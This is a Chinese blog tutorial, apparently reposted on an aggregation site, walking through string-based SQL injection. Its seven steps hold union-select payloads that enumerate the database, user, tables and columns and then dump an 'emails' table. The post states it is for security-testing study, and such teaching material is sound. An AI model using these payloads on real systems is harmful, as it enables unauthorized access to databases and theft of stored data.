美文网首页
SQL注入-字符型注入

SQL注入-字符型注入

作者: 夜尽雪舞 | 来源:发表于2020-05-25 15:39 被阅读0次

特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他

第一步:确认注入点类型

参数中输入' --+页面无报错提示,推测存在SQL注入注入类型为字符型

图-1

第二步:判断SQL语句中查询字段数,拼接2' order by 4 --+ 确认SQL钟查询字段数

图-2

第三步:判断SQL语句中查询字段数展示顺序,拼接 2' and 0=1 union select 1,2,3 --+

图-3

第四步:查询当前表名和用户名,id=2' and 0=1 union select 1,database(),user() --+,可见代码中直接连接了root用户

图-4

第五步:查询所有表名

id= 2 ' and 0=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

图-5

第六步:查询表中列表

id= 2 ' and 0=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name= 'emails' --+

图-7

第七步:查询想要的数据

2 ' and 0=1 union select 1,2,group_concat(concat_ws('-',id,email_id)) from `emails` --+

图-8

相关文章

  • SQL注入-字符型注入

    特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他 第一步:确认注入点类型 参数中输入' --+页面无报错...

  • DVWA之“SQL注入”

    漏洞类型:SQL注入/Get 字符型 安全级别:Low 目标:通过注入SQL语句,获取 MySql 数据库存放的用...

  • Less1

    基于报错的sql注入 字符型注入 数字型 括号型推测sql语句 **union ** 联合查询的方法,主要利用my...

  • SQL注入

    SQL分类: 按照数据类型分类:>整形注入>字符型注入 按照注入语法分类 按照数据提交方式分类> post> ge...

  • sql注入的一些笔记

    注入分类 数字型注入 -字符型注入 搜索型注入 XX型注入 注入提交方式 -get提交-post提交-cookie...

  • sql 注入笔记

    SQL注入 判断数字型和字符型还有闭合的原理 数字型的sql语句: 字符型的sql语句: 拿数字型来说,你不管在后...

  • 部分笔记(未完待续)

    0x01 SQL注入 1.GET型SQL注入 http://192.168.0.8:2333/pentest/sq...

  • sqlmap 使用步骤

    注入类型:字符型、数字型、搜索型 注入思路:1.检测是否存在注入 2.检测注入类型 3.构造注入语句 4.根据语句...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

网友评论

      本文标题:SQL注入-字符型注入

      本文链接:https://www.haomeiwen.com/subject/tiunohtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|SQL注入-字符型注入|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!